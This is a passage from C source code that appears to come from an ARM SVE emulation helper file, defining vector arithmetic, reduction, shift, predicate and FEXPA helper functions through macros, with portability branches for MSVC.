(0 - N) : N) #else #define DO_ABS(N) (N < 0 ? -N : N) #endif DO_ZPZ(sve_abs_b, int8_t, H1, DO_ABS) DO_ZPZ(sve_abs_h, int16_t, H1_2, DO_ABS) DO_ZPZ(sve_abs_s, int32_t, H1_4, DO_ABS) DO_ZPZ_D(sve_abs_d, int64_t, DO_ABS) #ifdef _MSC_VER #define DO_NEG(N) (0 - N) #else #define DO_NEG(N) (-N) #endif DO_ZPZ(sve_neg_b, uint8_t, H1, DO_NEG) DO_ZPZ(sve_neg_h, uint16_t, H1_2, DO_NEG) DO_ZPZ(sve_neg_s, uint32_t, H1_4, DO_NEG) DO_ZPZ_D(sve_neg_d, uint64_t, DO_NEG) DO_ZPZ(sve_revb_h, uint16_t, H1_2, bswap16) DO_ZPZ(sve_revb_s, uint32_t, H1_4, bswap32) DO_ZPZ_D(sve_revb_d, uint64_t, bswap64) DO_ZPZ(sve_revh_s, uint32_t, H1_4, hswap32) DO_ZPZ_D(sve_revh_d, uint64_t, hswap64) DO_ZPZ_D(sve_revw_d, uint64_t, wswap64) DO_ZPZ(sve_rbit_b, uint8_t, H1, revbit8) DO_ZPZ(sve_rbit_h, uint16_t, H1_2, revbit16) DO_ZPZ(sve_rbit_s, uint32_t, H1_4, revbit32) DO_ZPZ_D(sve_rbit_d, uint64_t, revbit64) /* Three-operand expander, unpredicated, in which the third operand is "wide". */ #define DO_ZZW(NAME, TYPE, TYPEW, H, OP) \ void HELPER(NAME)(void *vd, void *vn, void *vm, uint32_t desc) \ { \ intptr_t i, opr_sz = simd_oprsz(desc); \ for (i = 0; i < opr_sz; ) { \ TYPEW mm = *(TYPEW *)((char *)vm + i); \ do { \ TYPE nn = *(TYPE *)((char *)vn + H(i)); \ *(TYPE *)((char *)vd + H(i)) = OP(nn, mm); \ i += sizeof(TYPE); \ } while (i & 7); \ } \ } DO_ZZW(sve_asr_zzw_b, int8_t, uint64_t, H1, DO_ASR) DO_ZZW(sve_lsr_zzw_b, uint8_t, uint64_t, H1, DO_LSR) DO_ZZW(sve_lsl_zzw_b, uint8_t, uint64_t, H1, DO_LSL) DO_ZZW(sve_asr_zzw_h, int16_t, uint64_t, H1_2, DO_ASR) DO_ZZW(sve_lsr_zzw_h, uint16_t, uint64_t, H1_2, DO_LSR) DO_ZZW(sve_lsl_zzw_h, uint16_t, uint64_t, H1_2, DO_LSL) DO_ZZW(sve_asr_zzw_s, int32_t, uint64_t, H1_4, DO_ASR) DO_ZZW(sve_lsr_zzw_s, uint32_t, uint64_t, H1_4, DO_LSR) DO_ZZW(sve_lsl_zzw_s, uint32_t, uint64_t, H1_4, DO_LSL) #undef DO_ZZW #undef DO_CLS_B #undef DO_CLS_H #undef DO_CLZ_B #undef DO_CLZ_H #undef DO_CNOT #undef DO_FABS #undef DO_FNEG #undef DO_ABS #undef DO_NEG #undef DO_ZPZ #undef DO_ZPZ_D /* Two-operand reduction expander, controlled by a predicate. * The difference between TYPERED and TYPERET has to do with * sign-extension. E.g. for SMAX, TYPERED must be signed, * but TYPERET must be unsigned so that e.g. a 32-bit value * is not sign-extended to the ABI uint64_t return type. */ /* ??? If we were to vectorize this by hand the reduction ordering * would change. For integer operands, this is perfectly fine. 
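 * Note also that the INIT argument of each instantiation is the
 * identity element of its operation: 0 for ORR/EOR/ADD, all-ones for
 * AND and unsigned MIN, and the type's extreme value for signed
 * MAX/MIN, so an all-inactive predicate reduces to the architecturally
 * required result, e.g.
 *
 *   sve_smaxv_b -> INT8_MIN, sve_uminv_h -> 0xffff, sve_orv_s -> 0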
*/ #define DO_VPZ(NAME, TYPEELT, TYPERED, TYPERET, H, INIT, OP) \ uint64_t HELPER(NAME)(void *vn, void *vg, uint32_t desc) \ { \ intptr_t i, opr_sz = simd_oprsz(desc); \ TYPERED ret = INIT; \ for (i = 0; i < opr_sz; ) { \ uint16_t pg = *(uint16_t *)((char *)vg + H1_2(i >> 3)); \ do { \ if (pg & 1) { \ TYPEELT nn = *(TYPEELT *)((char *)vn + H(i)); \ ret = OP(ret, nn); \ } \ i += sizeof(TYPEELT), pg >>= sizeof(TYPEELT); \ } while (i & 15); \ } \ return (TYPERET)ret; \ } #define DO_VPZ_D(NAME, TYPEE, TYPER, INIT, OP) \ uint64_t HELPER(NAME)(void *vn, void *vg, uint32_t desc) \ { \ intptr_t i, opr_sz = simd_oprsz(desc) / 8; \ TYPEE *n = vn; \ uint8_t *pg = vg; \ TYPER ret = INIT; \ for (i = 0; i < opr_sz; i += 1) { \ if (pg[H1(i)] & 1) { \ TYPEE nn = n[i]; \ ret = OP(ret, nn); \ } \ } \ return ret; \ } DO_VPZ(sve_orv_b, uint8_t, uint8_t, uint8_t, H1, 0, DO_ORR) DO_VPZ(sve_orv_h, uint16_t, uint16_t, uint16_t, H1_2, 0, DO_ORR) DO_VPZ(sve_orv_s, uint32_t, uint32_t, uint32_t, H1_4, 0, DO_ORR) DO_VPZ_D(sve_orv_d, uint64_t, uint64_t, 0, DO_ORR) DO_VPZ(sve_eorv_b, uint8_t, uint8_t, uint8_t, H1, 0, DO_EOR) DO_VPZ(sve_eorv_h, uint16_t, uint16_t, uint16_t, H1_2, 0, DO_EOR) DO_VPZ(sve_eorv_s, uint32_t, uint32_t, uint32_t, H1_4, 0, DO_EOR) DO_VPZ_D(sve_eorv_d, uint64_t, uint64_t, 0, DO_EOR) DO_VPZ(sve_andv_b, uint8_t, uint8_t, uint8_t, H1, -1, DO_AND) DO_VPZ(sve_andv_h, uint16_t, uint16_t, uint16_t, H1_2, -1, DO_AND) DO_VPZ(sve_andv_s, uint32_t, uint32_t, uint32_t, H1_4, -1, DO_AND) DO_VPZ_D(sve_andv_d, uint64_t, uint64_t, -1, DO_AND) DO_VPZ(sve_saddv_b, int8_t, uint64_t, uint64_t, H1, 0, DO_ADD) DO_VPZ(sve_saddv_h, int16_t, uint64_t, uint64_t, H1_2, 0, DO_ADD) DO_VPZ(sve_saddv_s, int32_t, uint64_t, uint64_t, H1_4, 0, DO_ADD) DO_VPZ(sve_uaddv_b, uint8_t, uint64_t, uint64_t, H1, 0, DO_ADD) DO_VPZ(sve_uaddv_h, uint16_t, uint64_t, uint64_t, H1_2, 0, DO_ADD) DO_VPZ(sve_uaddv_s, uint32_t, uint64_t, uint64_t, H1_4, 0, DO_ADD) DO_VPZ_D(sve_uaddv_d, uint64_t, uint64_t, 0, DO_ADD) DO_VPZ(sve_smaxv_b, int8_t, int8_t, uint8_t, H1, INT8_MIN, DO_MAX) DO_VPZ(sve_smaxv_h, int16_t, int16_t, uint16_t, H1_2, INT16_MIN, DO_MAX) DO_VPZ(sve_smaxv_s, int32_t, int32_t, uint32_t, H1_4, INT32_MIN, DO_MAX) DO_VPZ_D(sve_smaxv_d, int64_t, int64_t, INT64_MIN, DO_MAX) DO_VPZ(sve_umaxv_b, uint8_t, uint8_t, uint8_t, H1, 0, DO_MAX) DO_VPZ(sve_umaxv_h, uint16_t, uint16_t, uint16_t, H1_2, 0, DO_MAX) DO_VPZ(sve_umaxv_s, uint32_t, uint32_t, uint32_t, H1_4, 0, DO_MAX) DO_VPZ_D(sve_umaxv_d, uint64_t, uint64_t, 0, DO_MAX) DO_VPZ(sve_sminv_b, int8_t, int8_t, uint8_t, H1, INT8_MAX, DO_MIN) DO_VPZ(sve_sminv_h, int16_t, int16_t, uint16_t, H1_2, INT16_MAX, DO_MIN) DO_VPZ(sve_sminv_s, int32_t, int32_t, uint32_t, H1_4, INT32_MAX, DO_MIN) DO_VPZ_D(sve_sminv_d, int64_t, int64_t, INT64_MAX, DO_MIN) DO_VPZ(sve_uminv_b, uint8_t, uint8_t, uint8_t, H1, -1, DO_MIN) DO_VPZ(sve_uminv_h, uint16_t, uint16_t, uint16_t, H1_2, -1, DO_MIN) DO_VPZ(sve_uminv_s, uint32_t, uint32_t, uint32_t, H1_4, -1, DO_MIN) DO_VPZ_D(sve_uminv_d, uint64_t, uint64_t, -1, DO_MIN) #undef DO_VPZ #undef DO_VPZ_D /* Two vector operand, one scalar operand, unpredicated. 
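 *
 * The scalar is truncated to the element type before use, and DO_SUBR
 * reverses the operands, so e.g. DO_ZZI(sve_subri_b, uint8_t, DO_SUBR)
 * computes imm - Zn.b[i] per lane rather than Zn.b[i] - imm.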
*/ #define DO_ZZI(NAME, TYPE, OP) \ void HELPER(NAME)(void *vd, void *vn, uint64_t s64, uint32_t desc) \ { \ intptr_t i, opr_sz = simd_oprsz(desc) / sizeof(TYPE); \ TYPE s = s64, *d = vd, *n = vn; \ for (i = 0; i < opr_sz; ++i) { \ d[i] = OP(n[i], s); \ } \ } #define DO_SUBR(X, Y) (Y - X) DO_ZZI(sve_subri_b, uint8_t, DO_SUBR) DO_ZZI(sve_subri_h, uint16_t, DO_SUBR) DO_ZZI(sve_subri_s, uint32_t, DO_SUBR) DO_ZZI(sve_subri_d, uint64_t, DO_SUBR) DO_ZZI(sve_smaxi_b, int8_t, DO_MAX) DO_ZZI(sve_smaxi_h, int16_t, DO_MAX) DO_ZZI(sve_smaxi_s, int32_t, DO_MAX) DO_ZZI(sve_smaxi_d, int64_t, DO_MAX) DO_ZZI(sve_smini_b, int8_t, DO_MIN) DO_ZZI(sve_smini_h, int16_t, DO_MIN) DO_ZZI(sve_smini_s, int32_t, DO_MIN) DO_ZZI(sve_smini_d, int64_t, DO_MIN) DO_ZZI(sve_umaxi_b, uint8_t, DO_MAX) DO_ZZI(sve_umaxi_h, uint16_t, DO_MAX) DO_ZZI(sve_umaxi_s, uint32_t, DO_MAX) DO_ZZI(sve_umaxi_d, uint64_t, DO_MAX) DO_ZZI(sve_umini_b, uint8_t, DO_MIN) DO_ZZI(sve_umini_h, uint16_t, DO_MIN) DO_ZZI(sve_umini_s, uint32_t, DO_MIN) DO_ZZI(sve_umini_d, uint64_t, DO_MIN) #undef DO_ZZI #undef DO_AND #undef DO_ORR #undef DO_EOR #undef DO_BIC #undef DO_ADD #undef DO_SUB #undef DO_MAX #undef DO_MIN #undef DO_ABD #undef DO_MUL #undef DO_DIV #undef DO_ASR #undef DO_LSR #undef DO_LSL #undef DO_SUBR /* Similar to the ARM LastActiveElement pseudocode function, except the result is multiplied by the element size. This includes the not found indication; e.g. not found for esz=3 is -8. */ static intptr_t last_active_element(uint64_t *g, intptr_t words, intptr_t esz) { uint64_t mask = pred_esz_masks[esz]; intptr_t i = words; do { uint64_t this_g = g[--i] & mask; if (this_g) { return i * 64 + (63 - clz64(this_g)); } } while (i > 0); return (intptr_t)-1 << esz; } uint32_t HELPER(sve_pfirst)(void *vd, void *vg, uint32_t words) { uint32_t flags = PREDTEST_INIT; uint64_t *d = vd, *g = vg; intptr_t i = 0; do { uint64_t this_d = d[i]; uint64_t this_g = g[i]; if (this_g) { if (!(flags & 4)) { /* Set in D the first bit of G. */ #ifdef _MSC_VER this_d |= this_g & (0 - this_g); #else this_d |= this_g & -this_g; #endif d[i] = this_d; } flags = iter_predtest_fwd(this_d, this_g, flags); } } while (++i < words); return flags; } uint32_t HELPER(sve_pnext)(void *vd, void *vg, uint32_t pred_desc) { intptr_t words = extract32(pred_desc, 0, SIMD_OPRSZ_BITS); intptr_t esz = extract32(pred_desc, SIMD_DATA_SHIFT, 2); uint32_t flags = PREDTEST_INIT; uint64_t *d = vd, *g = vg, esz_mask; intptr_t i, next; next = last_active_element(vd, words, esz) + (1ULL << esz); esz_mask = pred_esz_masks[esz]; /* Similar to the pseudocode for pnext, but scaled by ESZ so that we find the correct bit. */ if (next < words * 64) { uint64_t mask = -1; if (next & 63) { mask = ~((1ull << (next & 63)) - 1); next &= -64; } do { uint64_t this_g = g[next / 64] & esz_mask & mask; if (this_g != 0) { next = (next & -64) + ctz64(this_g); break; } next += 64; mask = -1; } while (next < words * 64); } i = 0; do { uint64_t this_d = 0; if (i == next / 64) { this_d = 1ull << (next & 63); } d[i] = this_d; flags = iter_predtest_fwd(this_d, g[i] & esz_mask, flags); } while (++i < words); return flags; } /* Store zero into every active element of Zd. We will use this for two * and three-operand predicated instructions for which logic dictates a * zero result. In particular, logical shift by element size, which is * otherwise undefined on the host. * * For element sizes smaller than uint64_t, we use tables to expand * the N bits of the controlling predicate to a byte mask, and clear * those bytes. 
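 *
 * E.g. a predicate byte of 0x05 (byte elements 0 and 2 active)
 * expands to the mask 0x0000000000ff00ff, so
 *
 *   d[i] &= ~expand_pred_b(0x05);   // zeroes byte lanes 0 and 2 only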
*/ void HELPER(sve_clr_b)(void *vd, void *vg, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd; uint8_t *pg = vg; for (i = 0; i < opr_sz; i += 1) { d[i] &= ~expand_pred_b(pg[H1(i)]); } } void HELPER(sve_clr_h)(void *vd, void *vg, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd; uint8_t *pg = vg; for (i = 0; i < opr_sz; i += 1) { d[i] &= ~expand_pred_h(pg[H1(i)]); } } void HELPER(sve_clr_s)(void *vd, void *vg, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd; uint8_t *pg = vg; for (i = 0; i < opr_sz; i += 1) { d[i] &= ~expand_pred_s(pg[H1(i)]); } } void HELPER(sve_clr_d)(void *vd, void *vg, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd; uint8_t *pg = vg; for (i = 0; i < opr_sz; i += 1) { if (pg[H1(i)] & 1) { d[i] = 0; } } } /* Copy Zn into Zd, and store zero into inactive elements. */ void HELPER(sve_movz_b)(void *vd, void *vn, void *vg, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd, *n = vn; uint8_t *pg = vg; for (i = 0; i < opr_sz; i += 1) { d[i] = n[i] & expand_pred_b(pg[H1(i)]); } } void HELPER(sve_movz_h)(void *vd, void *vn, void *vg, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd, *n = vn; uint8_t *pg = vg; for (i = 0; i < opr_sz; i += 1) { d[i] = n[i] & expand_pred_h(pg[H1(i)]); } } void HELPER(sve_movz_s)(void *vd, void *vn, void *vg, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd, *n = vn; uint8_t *pg = vg; for (i = 0; i < opr_sz; i += 1) { d[i] = n[i] & expand_pred_s(pg[H1(i)]); } } void HELPER(sve_movz_d)(void *vd, void *vn, void *vg, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd, *n = vn; uint8_t *pg = vg; for (i = 0; i < opr_sz; i += 1) { #ifdef _MSC_VER d[i] = n[i] & ((uint64_t)0 - (uint64_t)(pg[H1(i)] & 1)); #else d[i] = n[i] & -(uint64_t)(pg[H1(i)] & 1); #endif } } /* Three-operand expander, immediate operand, controlled by a predicate. */ #define DO_ZPZI(NAME, TYPE, H, OP) \ void HELPER(NAME)(void *vd, void *vn, void *vg, uint32_t desc) \ { \ intptr_t i, opr_sz = simd_oprsz(desc); \ TYPE imm = simd_data(desc); \ for (i = 0; i < opr_sz; ) { \ uint16_t pg = *(uint16_t *)((char *)vg + H1_2(i >> 3)); \ do { \ if (pg & 1) { \ TYPE nn = *(TYPE *)((char *)vn + H(i)); \ *(TYPE *)((char *)vd + H(i)) = OP(nn, imm); \ } \ i += sizeof(TYPE), pg >>= sizeof(TYPE); \ } while (i & 15); \ } \ } /* Similarly, specialized for 64-bit operands. */ #define DO_ZPZI_D(NAME, TYPE, OP) \ void HELPER(NAME)(void *vd, void *vn, void *vg, uint32_t desc) \ { \ intptr_t i, opr_sz = simd_oprsz(desc) / 8; \ TYPE *d = vd, *n = vn; \ TYPE imm = simd_data(desc); \ uint8_t *pg = vg; \ for (i = 0; i < opr_sz; i += 1) { \ if (pg[H1(i)] & 1) { \ TYPE nn = n[i]; \ d[i] = OP(nn, imm); \ } \ } \ } #define DO_SHR(N, M) (N >> M) #define DO_SHL(N, M) (N << M) /* Arithmetic shift right for division. This rounds negative numbers toward zero as per signed division. Therefore before shifting, when N is negative, add 2**M-1. */ #ifdef _MSC_VER #define DO_ASRD(N, M) ((N + (N < 0 ? (1 << M) - 1 : 0)) >> M) #else #define DO_ASRD(N, M) ((N + (N < 0 ? 
((__typeof(N))1 << M) - 1 : 0)) >> M) #endif DO_ZPZI(sve_asr_zpzi_b, int8_t, H1, DO_SHR) DO_ZPZI(sve_asr_zpzi_h, int16_t, H1_2, DO_SHR) DO_ZPZI(sve_asr_zpzi_s, int32_t, H1_4, DO_SHR) DO_ZPZI_D(sve_asr_zpzi_d, int64_t, DO_SHR) DO_ZPZI(sve_lsr_zpzi_b, uint8_t, H1, DO_SHR) DO_ZPZI(sve_lsr_zpzi_h, uint16_t, H1_2, DO_SHR) DO_ZPZI(sve_lsr_zpzi_s, uint32_t, H1_4, DO_SHR) DO_ZPZI_D(sve_lsr_zpzi_d, uint64_t, DO_SHR) DO_ZPZI(sve_lsl_zpzi_b, uint8_t, H1, DO_SHL) DO_ZPZI(sve_lsl_zpzi_h, uint16_t, H1_2, DO_SHL) DO_ZPZI(sve_lsl_zpzi_s, uint32_t, H1_4, DO_SHL) DO_ZPZI_D(sve_lsl_zpzi_d, uint64_t, DO_SHL) DO_ZPZI(sve_asrd_b, int8_t, H1, DO_ASRD) DO_ZPZI(sve_asrd_h, int16_t, H1_2, DO_ASRD) DO_ZPZI(sve_asrd_s, int32_t, H1_4, DO_ASRD) DO_ZPZI_D(sve_asrd_d, int64_t, DO_ASRD) #undef DO_SHR #undef DO_SHL #undef DO_ASRD #undef DO_ZPZI #undef DO_ZPZI_D /* Fully general four-operand expander, controlled by a predicate. */ #define DO_ZPZZZ(NAME, TYPE, H, OP) \ void HELPER(NAME)(void *vd, void *va, void *vn, void *vm, \ void *vg, uint32_t desc) \ { \ intptr_t i, opr_sz = simd_oprsz(desc); \ for (i = 0; i < opr_sz; ) { \ uint16_t pg = *(uint16_t *)((char *)vg + H1_2(i >> 3)); \ do { \ if (pg & 1) { \ TYPE nn = *(TYPE *)((char *)vn + H(i)); \ TYPE mm = *(TYPE *)((char *)vm + H(i)); \ TYPE aa = *(TYPE *)((char *)va + H(i)); \ *(TYPE *)((char *)vd + H(i)) = OP(aa, nn, mm); \ } \ i += sizeof(TYPE), pg >>= sizeof(TYPE); \ } while (i & 15); \ } \ } /* Similarly, specialized for 64-bit operands. */ #define DO_ZPZZZ_D(NAME, TYPE, OP) \ void HELPER(NAME)(void *vd, void *va, void *vn, void *vm, \ void *vg, uint32_t desc) \ { \ intptr_t i, opr_sz = simd_oprsz(desc) / 8; \ TYPE *d = vd, *a = va, *n = vn, *m = vm; \ uint8_t *pg = vg; \ for (i = 0; i < opr_sz; i += 1) { \ if (pg[H1(i)] & 1) { \ TYPE aa = a[i], nn = n[i], mm = m[i]; \ d[i] = OP(aa, nn, mm); \ } \ } \ } #define DO_MLA(A, N, M) (A + N * M) #define DO_MLS(A, N, M) (A - N * M) DO_ZPZZZ(sve_mla_b, uint8_t, H1, DO_MLA) DO_ZPZZZ(sve_mls_b, uint8_t, H1, DO_MLS) DO_ZPZZZ(sve_mla_h, uint16_t, H1_2, DO_MLA) DO_ZPZZZ(sve_mls_h, uint16_t, H1_2, DO_MLS) DO_ZPZZZ(sve_mla_s, uint32_t, H1_4, DO_MLA) DO_ZPZZZ(sve_mls_s, uint32_t, H1_4, DO_MLS) DO_ZPZZZ_D(sve_mla_d, uint64_t, DO_MLA) DO_ZPZZZ_D(sve_mls_d, uint64_t, DO_MLS) #undef DO_MLA #undef DO_MLS #undef DO_ZPZZZ #undef DO_ZPZZZ_D void HELPER(sve_index_b)(void *vd, uint32_t start, uint32_t incr, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc); uint8_t *d = vd; for (i = 0; i < opr_sz; i += 1) { d[H1(i)] = start + i * incr; } } void HELPER(sve_index_h)(void *vd, uint32_t start, uint32_t incr, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 2; uint16_t *d = vd; for (i = 0; i < opr_sz; i += 1) { d[H2(i)] = start + i * incr; } } void HELPER(sve_index_s)(void *vd, uint32_t start, uint32_t incr, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 4; uint32_t *d = vd; for (i = 0; i < opr_sz; i += 1) { d[H4(i)] = start + i * incr; } } void HELPER(sve_index_d)(void *vd, uint64_t start, uint64_t incr, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd; for (i = 0; i < opr_sz; i += 1) { d[i] = start + i * incr; } } void HELPER(sve_adr_p32)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 4; uint32_t sh = simd_data(desc); uint32_t *d = vd, *n = vn, *m = vm; for (i = 0; i < opr_sz; i += 1) { d[i] = n[i] + (m[i] << sh); } } void HELPER(sve_adr_p64)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t sh = 
simd_data(desc); uint64_t *d = vd, *n = vn, *m = vm; for (i = 0; i < opr_sz; i += 1) { d[i] = n[i] + (m[i] << sh); } } void HELPER(sve_adr_s32)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t sh = simd_data(desc); uint64_t *d = vd, *n = vn, *m = vm; for (i = 0; i < opr_sz; i += 1) { d[i] = n[i] + ((uint64_t)(int32_t)m[i] << sh); } } void HELPER(sve_adr_u32)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t sh = simd_data(desc); uint64_t *d = vd, *n = vn, *m = vm; for (i = 0; i < opr_sz; i += 1) { d[i] = n[i] + ((uint64_t)(uint32_t)m[i] << sh); } } void HELPER(sve_fexpa_h)(void *vd, void *vn, uint32_t desc) { /* These constants are cut-and-paste directly from the ARM pseudocode. */ static const uint16_t coeff[] = { 0x0000, 0x0016, 0x002d, 0x0045, 0x005d, 0x0075, 0x008e, 0x00a8, 0x00c2, 0x00dc, 0x00f8, 0x0114, 0x0130, 0x014d, 0x016b, 0x0189, 0x01a8, 0x01c8, 0x01e8, 0x0209, 0x022b, 0x024e, 0x0271, 0x0295, 0x02ba, 0x02e0, 0x0306, 0x032e, 0x0356, 0x037f, 0x03a9, 0x03d4, }; intptr_t i, opr_sz = simd_oprsz(desc) / 2; uint16_t *d = vd, *n = vn; for (i = 0; i < opr_sz; i++) { uint16_t nn = n[i]; intptr_t idx = extract32(nn, 0, 5); uint16_t exp = extract32(nn, 5, 5); d[i] = coeff[idx] | (exp << 10); } } void HELPER(sve_fexpa_s)(void *vd, void *vn, uint32_t desc) { /* These constants are cut-and-paste directly from the ARM pseudocode. */ static const uint32_t coeff[] = { 0x000000, 0x0164d2, 0x02cd87, 0x043a29, 0x05aac3, 0x071f62, 0x08980f, 0x0a14d5, 0x0b95c2, 0x0d1adf, 0x0ea43a, 0x1031dc, 0x11c3d3, 0x135a2b, 0x14f4f0, 0x16942d, 0x1837f0, 0x19e046, 0x1b8d3a, 0x1d3eda, 0x1ef532, 0x20b051, 0x227043, 0x243516, 0x25fed7, 0x27cd94, 0x29a15b, 0x2b7a3a, 0x2d583f, 0x2f3b79, 0x3123f6, 0x3311c4, 0x3504f3, 0x36fd92, 0x38fbaf, 0x3aff5b, 0x3d08a4, 0x3f179a, 0x412c4d, 0x4346cd, 0x45672a, 0x478d75, 0x49b9be, 0x4bec15, 0x4e248c, 0x506334, 0x52a81e, 0x54f35b, 0x5744fd, 0x599d16, 0x5bfbb8, 0x5e60f5, 0x60ccdf, 0x633f89, 0x65b907, 0x68396a, 0x6ac0c7, 0x6d4f30, 0x6fe4ba, 0x728177, 0x75257d, 0x77d0df, 0x7a83b3, 0x7d3e0c, }; intptr_t i, opr_sz = simd_oprsz(desc) / 4; uint32_t *d = vd, *n = vn; for (i = 0; i < opr_sz; i++) { uint32_t nn = n[i]; intptr_t idx = extract32(nn, 0, 6); uint32_t exp = extract32(nn, 6, 8); d[i] = coeff[idx] | (exp << 23); } } void HELPER(sve_fexpa_d)(void *vd, void *vn, uint32_t desc) { /* These constants are cut-and-paste directly from the ARM pseudocode. 
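     * Each entry holds the 52 fraction bits of 2**(i/64), so ORing in the
     * 11-bit exponent below assembles a complete IEEE double bit pattern
     * without any floating-point arithmetic.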
*/ static const uint64_t coeff[] = { 0x0000000000000ull, 0x02C9A3E778061ull, 0x059B0D3158574ull, 0x0874518759BC8ull, 0x0B5586CF9890Full, 0x0E3EC32D3D1A2ull, 0x11301D0125B51ull, 0x1429AAEA92DE0ull, 0x172B83C7D517Bull, 0x1A35BEB6FCB75ull, 0x1D4873168B9AAull, 0x2063B88628CD6ull, 0x2387A6E756238ull, 0x26B4565E27CDDull, 0x29E9DF51FDEE1ull, 0x2D285A6E4030Bull, 0x306FE0A31B715ull, 0x33C08B26416FFull, 0x371A7373AA9CBull, 0x3A7DB34E59FF7ull, 0x3DEA64C123422ull, 0x4160A21F72E2Aull, 0x44E086061892Dull, 0x486A2B5C13CD0ull, 0x4BFDAD5362A27ull, 0x4F9B2769D2CA7ull, 0x5342B569D4F82ull, 0x56F4736B527DAull, 0x5AB07DD485429ull, 0x5E76F15AD2148ull, 0x6247EB03A5585ull, 0x6623882552225ull, 0x6A09E667F3BCDull, 0x6DFB23C651A2Full, 0x71F75E8EC5F74ull, 0x75FEB564267C9ull, 0x7A11473EB0187ull, 0x7E2F336CF4E62ull, 0x82589994CCE13ull, 0x868D99B4492EDull, 0x8ACE5422AA0DBull, 0x8F1AE99157736ull, 0x93737B0CDC5E5ull, 0x97D829FDE4E50ull, 0x9C49182A3F090ull, 0xA0C667B5DE565ull, 0xA5503B23E255Dull, 0xA9E6B5579FDBFull, 0xAE89F995AD3ADull, 0xB33A2B84F15FBull, 0xB7F76F2FB5E47ull, 0xBCC1E904BC1D2ull, 0xC199BDD85529Cull, 0xC67F12E57D14Bull, 0xCB720DCEF9069ull, 0xD072D4A07897Cull, 0xD5818DCFBA487ull, 0xDA9E603DB3285ull, 0xDFC97337B9B5Full, 0xE502EE78B3FF6ull, 0xEA4AFA2A490DAull, 0xEFA1BEE615A27ull, 0xF50765B6E4540ull, 0xFA7C1819E90D8ull, }; intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd, *n = vn; for (i = 0; i < opr_sz; i++) { uint64_t nn = n[i]; intptr_t idx = extract32(nn, 0, 6); uint64_t exp = extract32(nn, 6, 11); d[i] = coeff[idx] | (exp << 52); } } void HELPER(sve_ftssel_h)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 2; uint16_t *d = vd, *n = vn, *m = vm; for (i = 0; i < opr_sz; i += 1) { uint16_t nn = n[i]; uint16_t mm = m[i]; if (mm & 1) { nn = float16_one; } d[i] = nn ^ (mm & 2) << 14; } } void HELPER(sve_ftssel_s)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 4; uint32_t *d = vd, *n = vn, *m = vm; for (i = 0; i < opr_sz; i += 1) { uint32_t nn = n[i]; uint32_t mm = m[i]; if (mm & 1) { nn = float32_one; } d[i] = nn ^ (mm & 2) << 30; } } void HELPER(sve_ftssel_d)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd, *n = vn, *m = vm; for (i = 0; i < opr_sz; i += 1) { uint64_t nn = n[i]; uint64_t mm = m[i]; if (mm & 1) { nn = float64_one; } d[i] = nn ^ (mm & 2) << 62; } } /* * Signed saturating addition with scalar operand. 
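 * Note that B may be negative, making this a saturating subtraction.
 * For example (illustrative), sve_sqaddi_b with a[i] = 100 and b = 50
 * stores 127 (INT8_MAX) rather than wrapping to -106.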
*/ void HELPER(sve_sqaddi_b)(void *d, void *a, int32_t b, uint32_t desc) { intptr_t i, oprsz = simd_oprsz(desc); for (i = 0; i < oprsz; i += sizeof(int8_t)) { int r = *(int8_t *)((char *)a + i) + b; if (r > INT8_MAX) { r = INT8_MAX; } else if (r < INT8_MIN) { r = INT8_MIN; } *(int8_t *)((char *)d + i) = r; } } void HELPER(sve_sqaddi_h)(void *d, void *a, int32_t b, uint32_t desc) { intptr_t i, oprsz = simd_oprsz(desc); for (i = 0; i < oprsz; i += sizeof(int16_t)) { int r = *(int16_t *)((char *)a + i) + b; if (r > INT16_MAX) { r = INT16_MAX; } else if (r < INT16_MIN) { r = INT16_MIN; } *(int16_t *)((char *)d + i) = r; } } void HELPER(sve_sqaddi_s)(void *d, void *a, int64_t b, uint32_t desc) { intptr_t i, oprsz = simd_oprsz(desc); for (i = 0; i < oprsz; i += sizeof(int32_t)) { int64_t r = *(int32_t *)((char *)a + i) + b; if (r > INT32_MAX) { r = INT32_MAX; } else if (r < INT32_MIN) { r = INT32_MIN; } *(int32_t *)((char *)d + i) = r; } } void HELPER(sve_sqaddi_d)(void *d, void *a, int64_t b, uint32_t desc) { intptr_t i, oprsz = simd_oprsz(desc); for (i = 0; i < oprsz; i += sizeof(int64_t)) { int64_t ai = *(int64_t *)((char *)a + i); int64_t r = ai + b; if (((r ^ ai) & ~(ai ^ b)) < 0) { /* Signed overflow. */ r = (r < 0 ? INT64_MAX : INT64_MIN); } *(int64_t *)((char *)d + i) = r; } } /* * Unsigned saturating addition with scalar operand. */ void HELPER(sve_uqaddi_b)(void *d, void *a, int32_t b, uint32_t desc) { intptr_t i, oprsz = simd_oprsz(desc); for (i = 0; i < oprsz; i += sizeof(uint8_t)) { int r = *(uint8_t *)((char *)a + i) + b; if (r > UINT8_MAX) { r = UINT8_MAX; } else if 